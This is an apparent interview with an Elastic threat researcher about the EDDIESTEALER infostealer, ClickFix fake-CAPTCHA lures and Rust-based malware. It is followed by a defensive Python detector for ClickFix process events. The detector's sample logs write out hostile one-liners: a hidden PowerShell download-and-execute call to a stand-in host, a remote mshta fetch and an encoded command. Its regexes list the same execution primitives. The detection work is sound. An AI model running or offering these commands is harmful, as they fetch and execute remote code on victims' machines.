In an age where malware mimics trusted interfaces and sidesteps technical controls, EDDIESTEALER represents a chilling evolution. In this exclusive conversation with CISO Forum, Devon Kerr, Director of Threat Research at Elastic, explains how modern infostealers are no longer just about exploiting code: they exploit human instinct. From fake CAPTCHA traps to Rust-based stealth and AI-powered deception, attackers now use everyday user behaviour as their entry point. Kerr warns of a new malware paradigm, one where detection is no longer about firewalls but about foresight. As cybersecurity enters an AI-versus-AI era, organisations must rethink protection before trust becomes their greatest vulnerability.

Director of Threat Research
Elastic
CISO Forum: EDDIESTEALER leverages fake CAPTCHA prompts to trick users — what does this reveal about the future of human-targeted malware tactics and social engineering?
Devon Kerr: EDDIESTEALER’s use of fake CAPTCHA prompts shows just how creatively threat actors are using social engineering. ClickFix appears to be the delivery method of choice when it comes to malware. Threat actors have widely used this technique. It involves deceiving users into pressing buttons in dialogue boxes to “fix” non-existent computer issues, or mimicking a familiar “I’m not a robot” verification flow. Doing so automatically copies a malicious script to the user’s clipboard; the user is then tricked into pasting and running the code, bypassing traditional perimeter defences completely.
This ClickFix tactic blurs the line between tech trickery and psychological manipulation, exploiting our trust in routine web interactions. What’s particularly insidious about this technique is that it capitalises on human nature to swiftly address an issue when presented with a solution.
Rust optimises binaries and enables the use of encrypted strings and custom API resolvers that complicate reverse engineering. Combine that with sandbox checks, file self‑deletion, and alternate‑data‑stream tricks, and you’ve got a malware strain built to slip through detection and analysis unnoticed.
We are now looking at a new wave of malware that weaponises user interaction as much as code flaws. Humans are the weak link, and attackers know it. Organisations must use a holistic approach to cybersecurity, one that utilises tools that ensure users do not self-sabotage in addition to individual vigilance, and is backed up by powerful technologies.
CISO Forum: How are modern infostealers evolving in capability and stealth, especially in the post-COVID digital ecosystem dominated by browsers, crypto wallets, and cloud apps?
Devon Kerr: Modern infostealers have grown far more capable and discreet, evolving rapidly in our post‑COVID digital ecosystem, which is defined by browsers, crypto wallets, and cloud apps. The shift to remote and hybrid work means each laptop, often loaded with personal and corporate logins, is now a valuable target. Attackers capitalise on this by bundling malware inside fake browser extensions, pirated downloads, and phishing kits that deliver multi‑stage loaders to breach everything from browser credentials to active session tokens, SSO cookies, MFA codes, and even seed phrases for crypto wallets.
Infostealers like AWRETCHCLIENT and BANSHEE take this further. They use encrypted payloads, stealthy in-memory execution, and remote debugging tricks to grab cookies, session tokens, even crypto wallet seeds, without triggering alarms.
BANSHEE’s emergence has also revealed an alarming trend. For a monthly fee, threat actors can access malware that is capable of collecting a wide variety of data and targets macOS, which has historically been less of a target compared to Windows.
Malware now features modular payloads, leverages malware-as-a-service, and spreads stealthily through trusted platforms like Google Drive while targeting both personal devices and enterprise cloud systems.
Malware has become quieter, its persistence shorter, and its exfiltration methods faster, with signals buried deeper than ever. Defending against this new reality requires a proactive approach, not just reactive detection. Organisations need to deploy security solutions that deliver fast, data-driven analytics directly within their Security Information and Event Management by leveraging data gathered across their entire attack surface. This will enable security teams to identify threats earlier and respond faster without the need to collect data.
The ability to act upon the data is just as essential; having the right tools that can be deployed immediately will empower an organisation to repel an intrusion or evict a threat swiftly.
CISO Forum: With AI increasingly embedded into both defence tools and offensive malware campaigns, how do you see this AI-versus-AI dynamic reshaping threat landscapes?
Devon Kerr: The AI arms race is being fought on many fronts, with cybersecurity being one of them. The use of AI on both offence and defence is fundamentally changing the cybersecurity landscape.
Threat actors have been using AI to bypass defences in some cases, while cybersecurity professionals are using AI to detect and counteract these advanced tactics. This dynamic drives rapid innovation on both sides, with each seeking to outpace the other.
Attackers are using AI to improve their phishing attempts and to obfuscate communication with implants, but are rapidly learning that AI has much greater potential.
Cybersecurity professionals have responded in kind with AI-driven detection and response, where they leverage AI to identify threats, correlate alerts in real time, and automate incident response.
Elastic Security is designed to capitalise on rich and diverse data with security analytics and AI-powered capabilities that improve detection engineering and real-time alert correlation. In significant ways, security teams are leveraging these features to detect emerging and conventional threats effectively.
CISO Forum: Rust is being adopted by malware authors for its stealth and performance benefits. What makes Rust-based malware like EDDIESTEALER harder to detect and analyse?
Devon Kerr: Rust-based malware, such as EDDIESTEALER, presents unique challenges for detection and analysis because Rust produces highly optimised, monolithic binaries with minimal metadata, making it harder to extract meaningful information or function names during analysis.
The fact that Rust can easily target multiple platforms (Windows, macOS, Linux), allowing malware authors to reuse code and techniques across environments, complicates detection efforts.
CISO Forum: Many ransomware and infostealer attacks now bypass traditional detection by abusing trusted user actions. Is endpoint protection fundamentally due for a rethink?
Devon Kerr: Many modern attacks no longer rely on breaking technical barriers; they exploit trusted user actions or legitimate platforms and tools. Malware like EDDIESTEALER uses fake CAPTCHA prompts to trick users into copying and running malicious code themselves, bypassing traditional detection entirely.
Endpoint protection is just as important as it has ever been. However, what organisations should be looking at is how current Endpoint Detection and Response (EDR) solutions can be further improved, given how adversaries are spending more of their efforts targeting users and executing malware in unconventional ways that current solutions cannot detect.
Modern EDRs will need to get eyes in those places. One example is user and entity behaviour analytics (UEBA), a security solution that uses behavioural analytics to detect suspicious activity based on behaviour, not just known signatures. This includes monitoring non-user entities, including servers, routers, and Internet of Things (IoT) devices, for unusual process injections, fileless attacks, and anomalous user actions.
CISO Forum: Beyond EDDIESTEALER, what larger trends do you see in malware delivery vectors — are CAPTCHAs just the beginning of a new wave of behavioral deception?
Devon Kerr: Elastic researchers are spotting a clear trend in malware delivery: a shift from technical exploitation to behavioural manipulation. Elastic’s telemetry shows a surge in “ClickFix-style” campaigns, where benign actions like copy-pasting PowerShell commands become the vector for infostealers and Remote Access Trojans (RATs), malware designed to allow an attacker to control an infected computer remotely. More threat actors are turning to ClickFix and fake CAPTCHA systems to deliver malware without having to deal with traditional software vulnerabilities.
The updated GHOSTPULSE loader, for instance, conceals its encrypted payload inside the pixels of a PNG image, then tricks users via CAPTCHA-style shortcuts to activate it.
We are entering a new era where more fake CAPTCHA attacks will embed the payload within various file types, such as images, documents, and even audio files like MP3. This malware will be distributed via identified methods like phishing emails or malvertising on untrusted websites. Still, we might start to see such CAPTCHA links being shared through social media platforms.
While self-infection via ClickFix will continue to be one of the significant trends we see for initial compromise, organisations must continue safeguarding themselves against other forms of initial compromise, such as edge exploitation and supply chain compromise.
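The interview describes the ClickFix chain twice (the clipboard-to-Run-dialog paste in Kerr's first answer and the copy-pasted PowerShell one-liners in his last): the user pastes an interpreter command that was never written to disk as a file, so the first reliable telemetry is the process-creation event. The following Python is an added example, not Elastic's code or anything from the interview, showing the kind of heuristic a detection engineer would run over Sysmon Event ID 1-style fields (ParentImage, Image, CommandLine). The log lines, the key=value layout, the indicator weights and the threshold are all constructed assumptions for this example; hostnames use the reserved .invalid TLD.

```python
"""Heuristic ClickFix / fake-CAPTCHA detection over process-creation telemetry.

Added example (not Elastic's code). Assumes Sysmon Event ID 1-style fields
flattened into constructed key="value" lines; weights and threshold are
assumptions chosen for this illustration, not tuned production values.
"""
import ntpath
import re
from typing import Dict, List

# Win+R Run dialog and the File Explorer address bar are children of explorer.exe,
# which is where a pasted ClickFix command is normally launched from.
PASTE_PARENTS = {"explorer.exe"}

# Interpreters a pasted one-liner usually lands in.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "curl.exe"}

# (compiled regex over the lowercased command line, weight, label). Weights are assumptions.
INDICATORS = [
    (re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b"), 2, "hidden window"),
    (re.compile(r"-(?:e|enc|encodedcommand)\s+[a-z0-9+/=]{20,}"), 2, "encoded command"),
    (re.compile(r"\b(?:iex|invoke-expression)\b"), 2, "in-memory execution"),
    (re.compile(r"\b(?:irm|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile)\b"),
     2, "remote download"),
    (re.compile(r"mshta(?:\.exe)?\s+https?://"), 3, "mshta remote HTA"),
    # ClickFix lures often append a CAPTCHA-themed comment so the pasted text looks legitimate.
    (re.compile(r"#\s*.*(?:not a robot|captcha|verification)"), 2, "CAPTCHA-themed trailing comment"),
]
THRESHOLD = 4  # assumption: two independent indicators (or one strong one plus context)

FIELD_RE = re.compile(r'(\w+)="((?:[^"\\]|\\.)*)"')


def parse_event(line: str) -> Dict[str, str]:
    """Parse a constructed key="value" line; only \" is treated as an escape."""
    return {k: v.replace('\\"', '"') for k, v in FIELD_RE.findall(line)}


def score_event(ev: Dict[str, str]) -> Dict:
    parent = ntpath.basename(ev.get("ParentImage", "")).lower()
    image = ntpath.basename(ev.get("Image", "")).lower()
    low = ev.get("CommandLine", "").lower()
    score, reasons = 0, []
    if image in INTERPRETERS and parent in PASTE_PARENTS:
        score += 2
        reasons.append("interpreter spawned by explorer.exe (Run dialog / address bar)")
    for rx, weight, label in INDICATORS:
        if rx.search(low):
            score += weight
            reasons.append(label)
    return {"parent": parent, "image": image, "score": score,
            "reasons": reasons, "suspicious": score >= THRESHOLD}


def detect_clickfix(lines: List[str]) -> List[Dict]:
    return [score_event(parse_event(line)) for line in lines]


# Constructed sample telemetry (not real captures).
SAMPLE_EVENTS = [
    # Classic ClickFix one-liner pasted into Win+R, with the lure's trailing "verification" comment.
    r'ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'CommandLine="powershell -w hidden -c \"iex (irm https://verify.example.invalid/c.txt)\" '
    r'# I am not a robot - reCAPTCHA Verification ID: 8120"',
    # mshta variant fetching a remote HTA.
    r'ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\mshta.exe" '
    r'CommandLine="mshta https://cdn.example.invalid/verify.hta # Verification ID 4431"',
    # Encoded command from an interactive shell: noteworthy, but lacks the paste-from-explorer context.
    r'ParentImage="C:\Windows\System32\cmd.exe" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'CommandLine="powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"',
    # Benign: a user double-clicks a local script from Explorer.
    r'ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'CommandLine="powershell -File C:\Users\alice\Documents\backup.ps1"',
    # Benign: not an interpreter at all.
    r'ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\notepad.exe" CommandLine="notepad.exe notes.txt"',
]

if __name__ == "__main__":
    for result in detect_clickfix(SAMPLE_EVENTS):
        flag = "ALERT" if result["suspicious"] else "ok   "
        print(f"{flag} score={result['score']:2d} {result['parent']} -> {result['image']}: {result['reasons']}")
```

The scoring is deliberately additive rather than a single signature: the explorer.exe parent alone is normal (every double-clicked script has it), and a hidden window or an `iex` alone has admin false positives, but the combination seen in pasted lures stacks quickly while the benign samples stay under the threshold. In production this logic belongs in the EDR or SIEM query layer against real process telemetry, with the weights tuned against the environment's own baseline.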